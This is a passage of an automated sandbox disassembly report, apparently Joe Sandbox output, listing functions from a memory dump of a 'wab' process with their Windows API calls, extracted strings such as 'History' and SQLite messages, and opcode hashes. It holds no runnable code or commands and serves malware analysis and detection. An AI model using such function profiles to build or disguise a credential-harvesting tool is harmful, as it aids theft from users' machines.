                                                                                  • API String ID: 1589464350-1420421710
                                                                                  • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                  • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                  • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                  • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0040FDD5
                                                                                    • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                                                                                    • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                    • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                  • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                  • String ID: <%s>%s</%s>$</item>$<item>
                                                                                  • API String ID: 1775345501-2769808009
                                                                                  • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                  • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                  • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                  • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • wcscpy.MSVCRT ref: 0041477F
                                                                                  • wcscpy.MSVCRT ref: 0041479A
                                                                                  • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: wcscpy$CloseCreateFileHandle
                                                                                  • String ID: General
                                                                                  • API String ID: 999786162-26480598
                                                                                  • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                  • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                  • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                  • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastMessage_snwprintf
                                                                                  • String ID: Error$Error %d: %s
                                                                                  • API String ID: 313946961-1552265934
                                                                                  • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                  • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                  • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                  • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: foreign key constraint failed$new$oid$old
                                                                                  • API String ID: 0-1953309616
                                                                                  • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                  • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                  • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                  • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                  • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                  • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy
                                                                                  • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                  • API String ID: 3510742995-272990098
                                                                                  • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                  • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                  • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                  • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpymemset
                                                                                  • String ID: gj
                                                                                  • API String ID: 1297977491-4203073231
                                                                                  • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                  • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                  • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                  • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                                                                    • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??3@
                                                                                  • String ID:
                                                                                  • API String ID: 613200358-0
                                                                                  • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                  • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                  • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                  • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                  • malloc.MSVCRT ref: 004174BD
                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                                                                  • String ID:
                                                                                  • API String ID: 2903831945-0
                                                                                  • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                  • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                  • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                  • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetParent.USER32(?), ref: 0040D453
                                                                                  • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                  • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Rect$ClientParentPoints
                                                                                  • String ID:
                                                                                  • API String ID: 4247780290-0
                                                                                  • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                  • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                  • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                  • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                  • memset.MSVCRT ref: 004450CD
                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                                    • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                  • String ID:
                                                                                  • API String ID: 1471605966-0
                                                                                  • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                  • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                  • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                  • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • wcscpy.MSVCRT ref: 0044475F
                                                                                  • wcscat.MSVCRT ref: 0044476E
                                                                                  • wcscat.MSVCRT ref: 0044477F
                                                                                  • wcscat.MSVCRT ref: 0044478E
                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                    • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                                                    • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                  • String ID: \StringFileInfo\
                                                                                  • API String ID: 102104167-2245444037
                                                                                  • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                  • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                  • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                  • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??3@
                                                                                  • String ID:
                                                                                  • API String ID: 613200358-0
                                                                                  • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                  • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                  • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                  • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy$??3@
                                                                                  • String ID: g4@
                                                                                  • API String ID: 3314356048-2133833424
                                                                                  • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                  • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                  • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                  • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memicmpwcslen
                                                                                  • String ID: @@@@$History
                                                                                  • API String ID: 1872909662-685208920
                                                                                  • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                  • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                  • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                  • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 004100FB
                                                                                  • memset.MSVCRT ref: 00410112
                                                                                    • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                    • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                  • _snwprintf.MSVCRT ref: 00410141
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                  • String ID: </%s>
                                                                                  • API String ID: 3400436232-259020660
                                                                                  • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                  • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                  • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                  • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0040D58D
                                                                                  • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                  • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ChildEnumTextWindowWindowsmemset
                                                                                  • String ID: caption
                                                                                  • API String ID: 1523050162-4135340389
                                                                                  • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                  • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                  • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                  • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                    • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                  • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                  • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                  • String ID: MS Sans Serif
                                                                                  • API String ID: 210187428-168460110
                                                                                  • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                  • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                  • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                  • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClassName_wcsicmpmemset
                                                                                  • String ID: edit
                                                                                  • API String ID: 2747424523-2167791130
                                                                                  • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                  • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                  • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                  • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                  • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                  • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                  • String ID: SHAutoComplete$shlwapi.dll
                                                                                  • API String ID: 3150196962-1506664499
                                                                                  • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                  • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                  • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                  • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy$memcmp
                                                                                  • String ID:
                                                                                  • API String ID: 3384217055-0
                                                                                  • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                  • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                  • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                  • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$memcpy
                                                                                  • String ID:
                                                                                  • API String ID: 368790112-0
                                                                                  • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                  • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                  • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                  • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                    • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                    • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                    • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                    • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                  • GetMenu.USER32(?), ref: 00410F8D
                                                                                  • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                  • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                  • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                  • String ID:
                                                                                  • API String ID: 1889144086-0
                                                                                  • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                  • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
